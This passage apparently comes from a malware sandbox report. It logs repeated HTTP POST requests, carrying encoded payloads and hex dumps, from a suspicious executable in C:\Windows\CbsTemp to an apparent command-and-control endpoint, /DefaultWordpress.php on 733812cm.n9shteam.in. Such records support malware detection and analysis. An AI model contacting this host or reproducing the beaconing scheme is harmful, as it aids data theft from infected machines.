                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12928&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2807&delivery_rate=112048&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.549835188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:07.438918114 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:07.792095900 CEST2528OUTData Raw: 5b 5a 59 5e 5f 5f 51 50 54 5b 52 57 50 52 57 52 50 59 5d 5f 50 52 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZY^__QPT[RWPRWRPY]_PRW[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=*$89W+#?_0-S=>>'0;%2#X0:'-%+#F $P.
                                                          Oct 20, 2024 18:18:08.237895012 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:08.598839998 CEST800INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:08 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GXt1p%2BzzELTICcxOZCb0jk2%2FF%2F3l37t6TFRsoo%2BYXOv4%2FaakyhxCPJVQ4XK1g%2BPuEOKPrZBVnC504LdIk4KRk8696WES92fqrxGEwnuDFV03wWm7MQBu7ShsVT8L%2BEmO%2FbcuaMxs%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5270eaf79809-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12394&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=129842&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.549838188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:08.738465071 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:09.088946104 CEST2528OUTData Raw: 5b 5d 59 5c 5a 5a 51 57 54 5b 52 57 50 5e 57 54 50 5a 5d 5f 50 50 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: []Y\ZZQWT[RWP^WTPZ]_PPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]):2"((':+=<\)/0=_2%+9'"^(#F $P.4
                                                          Oct 20, 2024 18:18:09.524844885 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:09.781639099 CEST796INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:09 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2FmXxw%2F9CkT%2FHeJK4QZ3Am0D05mL3%2FFvLvQM7629PxTw6MR%2F%2BmuDHDtCFbZXx4Wmwhh8cxjURPqKFfPRHA3HubIsHfyQs9R19J%2FRaQJNXEF0wcDiIXXCTuZPW92cuy5T1itNsAWuTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5279088222d2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11828&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130005&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.549842188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:09.586019993 CEST310OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:09.933116913 CEST540OUTData Raw: 5b 50 59 5f 5f 5d 51 55 54 5b 52 57 50 5d 57 57 50 5f 5d 5c 50 57 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PY__]QUT[RWP]WWP_]\PWWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \=1_$+<3((4=('+$!Y0='X*Y+:#F $P.
                                                          Oct 20, 2024 18:18:10.407501936 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:10.641581059 CEST786INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:10 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jcLX5UYsJWLojHM%2FPdPoEC%2F8BiciwckG96egiA5ZdzPZcQNVjGOJQBK0KWxLJK%2Bw2yMKYcOUnyWFuGLsSB7KhsWJVlgIlgqZj1DStAjXIx8dWwXHsz2gxsOZNMBvAU6wJAafqTAbRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a527e8cf6f967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11163&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=130462&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:10.645262957 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:10.817346096 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:10.817724943 CEST2528OUTData Raw: 5e 58 59 5c 5f 58 51 53 54 5b 52 57 50 58 57 50 50 5a 5d 5e 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^XY\_XQST[RWPXWPPZ]^PPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#):%+&>04$86=>7=+&=32$8"X0-"^?#F $P.,
                                                          Oct 20, 2024 18:18:11.204118013 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJc2PNTt55lSO1Y4X6%2FSaMNWd32sSjo9aIdTG5aQq%2FYe9GZOBE0V3%2B3Bc%2FUnsNaXNdJ6UuYOUedXzstsq203GjlSJYOA2L2QQ5r0TESy6U3r0DeY459HDiKch55xi8Am4UI2mlAhbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52811f7ef967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11187&sent=6&recv=10&lost=0&retrans=0&sent_bytes=836&recv_bytes=3665&delivery_rate=257170&cwnd=39&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:11.204474926 CEST322OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----GvMv93IGtr13jYgJ5FalRo73Vuj4HCErNX
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2978
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:11.378434896 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:11.378679991 CEST2978OUTData Raw: 2d 2d 2d 2d 2d 2d 47 76 4d 76 39 33 49 47 74 72 31 33 6a 59 67 4a 35 46 61 6c 52 6f 37 33 56 75 6a 34 48 43 45 72 4e 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------GvMv93IGtr13jYgJ5FalRo73Vuj4HCErNXContent-Disposition: form-data; name="0"Content-Type: text/plain^\Y__^QUT[RWP^WQPZ][PTWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:11.780561924 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:11 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ex7EBbs3ggPA4DEadTUFo27FsYsMOL2CpfzzIknpZjx5YJk70EEOluKen1%2BDGctmKa9IwarKo2BSyRvlSd8PfSvayckziT6QBfobfmStd6O3LRgBGOcEYu5aWEOtB3rsMmp3pbGcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52849a98f967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11231&sent=11&recv=17&lost=0&retrans=0&sent_bytes=1652&recv_bytes=6965&delivery_rate=257170&cwnd=42&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:11.790975094 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:11.959316969 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:11.963150978 CEST2528OUTData Raw: 5b 5b 5c 5d 5f 59 51 56 54 5b 52 57 50 52 57 55 50 59 5d 5e 50 51 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\]_YQVT[RWPRWUPY]^PQW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#>1[&]:< 7\'(.?.4= Z33^1!0+>[0:]+#F $P.
                                                          Oct 20, 2024 18:18:12.355777979 CEST791INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=orZmM6iJCShX3fjbIHsa33iigChOQBKAeJFXju87CMbcDBcbwlaFwQNs7pL6EUUCpTlqo1z3TR%2BIQe7waGzH8oPuTaxo%2FW78hM5Bdz1zNYaL82kE5Fc2Gqe0NCp81Z1Q%2Brcgvu3YLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52883e15f967-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11234&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2464&recv_bytes=9780&delivery_rate=257170&cwnd=43&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.549845188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:09.893937111 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:10.245141029 CEST1924OUTData Raw: 5b 5b 5c 58 5f 5a 51 50 54 5b 52 57 50 5f 57 55 50 5a 5d 5e 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\X_ZQPT[RWP_WUPZ]^P]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ))Z1("(3;\'(?.4=?X3>/X&W?')%>5(#F $P.0
                                                          Oct 20, 2024 18:18:11.714519024 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:12.092942953 CEST945INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzh4zVAiN%2BreDjfKkQbXhZW6%2BJvI1KrulClLU2pgEOTMhBq0QrJzAufy5iZRz%2FhMYhqTSLC6WnONTeIW7%2F68whNV9mYH3UtrZmNnMO%2FthFtmEuHv0OUMiSZ%2FcGNx7T6qi1BV%2BXolEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5286a83b2513-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11313&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2235&delivery_rate=130438&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 5b 27 11 23 51 3d 06 30 10 2e 58 3e 0f 39 2e 2b 19 39 31 21 14 30 0d 03 05 25 5c 3d 58 32 33 2c 03 22 2c 00 59 23 3f 29 10 2d 0c 28 5e 07 12 26 10 28 02 37 06 2b 2d 09 07 3f 38 2b 01 21 34 33 09 25 5b 3b 1c 27 2d 32 00 3e 0f 2d 5b 3d 2d 26 1c 2c 24 08 1b 2e 28 0e 5b 37 2a 22 53 03 13 25 10 29 0e 20 11 36 0c 11 58 2b 2e 3f 58 2b 3b 2e 58 3e 33 20 04 2b 28 2b 12 38 03 26 5a 24 11 05 03 26 06 28 5d 25 2a 30 09 24 10 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&['#Q=0.X>9.+91!0%\=X23,",Y#?)-(^&(7+-?8+!43%[;'-2>-[=-&,$.([7*"S%) 6X+.?X+;.X>3 +(+8&Z$&(]%*0$$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.549853188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:12.492455959 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:12.838970900 CEST2528OUTData Raw: 5b 51 5c 53 5f 5e 54 57 54 5b 52 57 50 53 57 51 50 5f 5d 58 50 5d 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\S_^TWT[RWPSWQP_]XP]W[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ^)3=Y1T>3]&(!<(]=?/&=;_&!$'\':_(#F $P.
                                                          Oct 20, 2024 18:18:13.311400890 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:13.681202888 CEST790INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wuok4hq6DtH0soMtEomz9K%2Bz0fDJMPplz1CkwicgVpYZiLBamxEAD1BU0MzdG1seek7u2aPcs%2F3AP2SvZ%2FNelF8uULjIxTkiy8zH3iT2%2Bug66vBlGB6u9CYO92Sw0mgUBUG7aOqWKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5290aaf32368-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13007&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112161&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.549858188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:13.813910007 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:14.166963100 CEST2528OUTData Raw: 5b 59 5c 5f 5a 5f 54 51 54 5b 52 57 50 58 57 5d 50 5a 5d 5a 50 5d 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\_Z_TQT[RWPXW]PZ]ZP]W[\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ \>32;%(;[3(1R?.,>Y(]$'&W+'*\$="_(*#F $P.,
                                                          Oct 20, 2024 18:18:14.617961884 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:14.991956949 CEST785INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:14 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S2sqOFtht1Objkq8MHyx69VOQc0BBApMPMKM7ya8p7GCIQkzKA%2BubHHEoUwEJ8QIFFVBoN61YNckBIsKwN7sdrFQPL2aGKo0Ij0JJTJ3q6veq2yzwrNXDfDXXBHzd1LxlM%2BuAp9QmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5298d8339456-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11991&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=122132&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.549862188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:15.130748987 CEST311OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2516
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:15.479419947 CEST2516OUTData Raw: 5b 5a 59 5c 5a 58 54 55 54 5b 52 57 50 5a 57 54 50 51 5d 58 50 56 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [ZY\ZXTUT[RWPZWTPQ]XPVWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(3>&+.(_$R<8Y>$[<&#Z$2[0.<#F $P.
                                                          Oct 20, 2024 18:18:15.914083958 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:16.508117914 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:16 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
